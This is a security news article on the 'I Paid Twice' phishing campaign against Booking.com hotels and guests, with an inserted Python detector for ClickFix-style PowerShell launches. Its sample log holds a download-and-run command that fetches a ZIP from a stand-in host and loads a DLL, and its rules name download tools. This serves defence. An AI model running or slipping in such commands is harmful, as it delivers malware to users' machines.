Phishing Campaign “I Paid Twice” Targets Booking.com Hotels and Guests

Cybercriminals are exploiting hotel booking platforms in a global phishing scheme that tricks guests into paying for reservations twice.

Ken Underhill
Nov 7, 2025
eSecurity Planet content and product recommendations are editorially independent.

A newly discovered cybercrime campaign has been targeting Booking.com hotel partners and their customers in a sophisticated global phishing operation dubbed “I Paid Twice.” 

According to Sekoia researchers, the campaign leverages compromised hotel accounts and advanced social engineering techniques to defraud both businesses and travelers, often convincing victims to unknowingly pay for reservations twice.

Inside the “I Paid Twice” Attack

Sekoia analysts traced the campaign back to earlier infostealer infections that infiltrated hotel networks and stole professional credentials. 

These stolen credentials granted threat actors access to hotel accounts on booking platforms such as Booking.com and Expedia, enabling them to impersonate legitimate hotel staff and contact guests directly.

Attackers sent emails or WhatsApp messages using authentic reservation details, creating a convincing sense of legitimacy. 

Victims were told that a “bank verification issue” required them to reconfirm their payment, often through a phishing link designed to mimic Booking.com’s interface. 

The link redirected to a fraudulent payment portal hosted on infrastructure in Russia that is operated by a suspected bulletproof hosting provider.

This campaign has been active since April 2025, with multiple reports of defrauded guests across Europe, Asia, and North America. 

Once customers entered their banking details, attackers either used them to take the money directly or sold the harvested credentials on cybercrime forums.

The Attack Stages

Sekoia’s analysis uncovered that the initial compromise often originated from malicious emails sent to hotel administrators. 

These emails imitated Booking.com notifications and contained URLs that led to a ClickFix social engineering lure.

The attack unfolded in several stages:

  1. Redirection and deception: The malicious link redirected through a network of compromised domains to conceal the attacker’s infrastructure.
  2. Fake CAPTCHA execution: Victims were prompted to copy and paste a “verification command” into PowerShell, unwittingly executing malware.
  3. Payload delivery: The PowerShell command downloaded a ZIP archive containing a malicious executable and DLL files. These files initiated the PureRAT malware infection, granting remote access, keylogging, and data exfiltration capabilities.

Once compromised, hotel systems were used to send further phishing emails or sell the stolen credentials as Booking.com extranet logs in underground forums.

A Thriving Cybercrime Ecosystem

The researchers found a highly organized cybercrime market dedicated to exploiting the hospitality industry. 

On Russian-speaking forums such as LolzTeam and Exploit[.]in, cybercriminals openly trade stolen Booking.com credentials, phishing kits, and log checkers that validate the authenticity of compromised accounts.

Some threat actors, including a user known as moderator_booking, advertise services buying or selling access to Booking.com, Expedia, and Airbnb accounts. 

These logs — bundles of credentials, cookies, and system data harvested by malware — can sell for $30 to over $5,000, depending on account value and reservation volume. 

This growing ecosystem reflects a professionalization of cyber fraud targeting travel platforms, mirroring trends seen in banking and cryptocurrency theft.

The Role of PureRAT Malware

At the technical level, PureRAT (PureHVNC) plays a central role in maintaining persistence and remote control. 

Sold as a Malware-as-a-Service (MaaS) tool, PureRAT enables full system access, webcam and microphone capture, credential theft, and file exfiltration. 

Once deployed, it communicates with command-and-control servers over encrypted TCP/TLS connections, sending victim data such as system info, antivirus status, and screenshots.

Its modular plugin system allows attackers to expand functionality on demand — loading remote desktop tools, data theft modules, or in-memory executors for fileless persistence. 

Building a Stronger Defense

Defending against operations like “I Paid Twice” requires a multi-layered security approach spanning prevention, detection, and response. Some steps organizations can take include:

  • Tighten access controls: Restrict admin access, enable MFA, and revoke compromised credentials fast.
  • Train staff on phishing: Teach employees to spot fake Booking.com messages and avoid unsafe links or commands.
  • Monitor for anomalies: Use endpoint tools to detect suspicious PowerShell, registry, or DLL activity.
  • Review integrations: Audit APIs and data connections to enforce least-privilege access.
  • Secure email and networks: Enable SPF, DKIM, and DMARC; separate admin systems from guest Wi-Fi.
  • Use threat intelligence: Apply PowerShell and Sysmon rules to flag abnormal file or registry behavior.

These steps help reduce risk and build cyber resilience against similar attacks.
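The "Fake CAPTCHA execution" and "Payload delivery" stages above, and the "Monitor for anomalies" and "Use threat intelligence" bullets, both come down to the same question for a hotel's security team: does a PowerShell process launched by a user look like a pasted download-and-run chain? The following is an added example (not code from Sekoia, eSecurity Planet, or any vendor product) of a heuristic scorer over Sysmon Event ID 1 (process creation) records. It assumes a simplified tab-separated `key=value` export of the Sysmon fields `Image`, `ParentImage`, `CommandLine` and `User`; real Sysmon writes XML/EVTX, so a production version would read those instead. The sample log lines, hostnames, user names, the `captcha.example` domain and the indicator weights are all constructed for illustration.

```python
"""Heuristic detection of ClickFix-style PowerShell launches in Sysmon ProcessCreate events.

Added example, not code from Sekoia or eSecurity Planet. The log format below is a
constructed tab-separated key=value export of a subset of Sysmon Event ID 1 fields.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Subset of a Sysmon Event ID 1 (ProcessCreate) record."""
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str
    user: str


# Parents a user-driven ClickFix lure typically goes through: the Win+R "Run" box
# (spawned by explorer.exe) or an interactive console the victim pasted into.
USER_LAUNCHERS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# (regex, weight, label): each indicator maps to one step of the download-and-run
# chain the article describes (hidden window, fetch archive, extract, load DLL).
# Weights are constructed assumptions; tune them against your own baseline.
INDICATORS = [
    (r"(?i)-(?:w|win|windowstyle)\s+hidden", 2, "hidden window"),
    (r"(?i)-(?:nop|noprofile)\b", 1, "profile bypass"),
    (r"(?i)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", 3, "encoded command"),
    (r"(?i)\b(?:invoke-webrequest|iwr|curl|wget|downloadstring|downloadfile|start-bitstransfer)\b",
     3, "remote download"),
    (r"(?i)(?:\bexpand-archive\b|\.zip\b)", 2, "archive extraction"),
    (r"(?i)\b(?:iex|invoke-expression)\b", 3, "invoke-expression"),
    (r"(?i)\brundll32(?:\.exe)?\b", 2, "rundll32 DLL load"),
]
ALERT_THRESHOLD = 6  # constructed: a plain interactive script run stays well below this


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, reasons) for one event; 0 for anything that is not PowerShell."""
    if basename(ev.image) not in POWERSHELL_IMAGES:
        return 0, []
    score, reasons = 0, []
    parent = basename(ev.parent_image)
    if parent in USER_LAUNCHERS:
        score += 2
        reasons.append(f"launched from {parent}")
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, ev.command_line):
            score += weight
            reasons.append(label)
    return score, reasons


def parse_event(line: str) -> ProcessEvent:
    """Parse one constructed tab-separated key=value record into a ProcessEvent."""
    fields = {}
    for part in line.split("\t"):
        key, _, value = part.partition("=")  # split on the first '=' only (base64 may end in '=')
        fields[key] = value
    return ProcessEvent(fields["Image"], fields["ParentImage"], fields["CommandLine"], fields["User"])


def find_alerts(lines: list[str]) -> list[tuple[str, int, list[str]]]:
    """Return (user, score, reasons) for every record at or above ALERT_THRESHOLD."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        score, reasons = score_event(ev)
        if score >= ALERT_THRESHOLD:
            alerts.append((ev.user, score, reasons))
    return alerts


PS51 = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed sample records (not real telemetry).
SAMPLE_LOG = [
    # benign: staff member runs a maintenance script from the Run box (score 3)
    f"Image={PS51}\tParentImage=C:\\Windows\\explorer.exe"
    "\tCommandLine=powershell.exe -NoProfile -File C:\\Scripts\\nightly-report.ps1\tUser=HOTEL\\frontdesk",
    # ClickFix chain: hidden window, fetch ZIP, extract, load DLL (score 12)
    f"Image={PS51}\tParentImage=C:\\Windows\\explorer.exe"
    "\tCommandLine=powershell -w hidden -nop -c \"iwr https://captcha.example/v.zip -OutFile $env:TEMP\\v.zip; "
    "Expand-Archive $env:TEMP\\v.zip $env:TEMP\\v; rundll32 $env:TEMP\\v\\x.dll,Run\"\tUser=HOTEL\\frontdesk",
    # benign: scheduled task under svchost, no download (score 1)
    "Image=C:\\Program Files\\PowerShell\\7\\pwsh.exe\tParentImage=C:\\Windows\\System32\\svchost.exe"
    "\tCommandLine=pwsh.exe -NoProfile -Command Get-ChildItem C:\\Backups\tUser=NT AUTHORITY\\SYSTEM",
    # encoded command pasted from the Run box; payload is constructed base64 (score 8)
    f"Image={PS51}\tParentImage=C:\\Windows\\explorer.exe"
    "\tCommandLine=powershell.exe -nop -w hidden -enc ZQBjAGgAbwAgAGgAaQA=\tUser=HOTEL\\reception",
]

if __name__ == "__main__":
    for user, score, reasons in find_alerts(SAMPLE_LOG):
        print(f"ALERT score={score} user={user}: {', '.join(reasons)}")
```

The parent-process check is what separates a pasted lure from routine administration: the same `-NoProfile` script run by a scheduled task under `svchost.exe` scores 1, while the same flags from the Run box on a front-desk workstation start at 3 before any download indicator is counted. The individual regexes are easy to evade in isolation, which is why the scorer sums them rather than alerting on any single one; the equivalent logic can be carried into a SIEM rule or a Sysmon configuration once the weights have been checked against a site's own PowerShell baseline.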

A Growing Threat to the Travel Industry

The “I Paid Twice” campaign underscores how criminal groups are weaponizing trust in global platforms and targeting hospitality. 

Sekoia warns that such campaigns are unlikely to disappear soon. 

As long as infostealer malware and stolen credentials remain cheap and accessible, cybercriminals will continue exploiting the intersection between human error and automated trust systems.

This growing abuse of digital trust highlights why adopting a zero-trust approach is essential to limit access, verify every connection, and contain breaches before they spread.

Property of TechnologyAdvice. © 2025 TechnologyAdvice. All Rights Reserved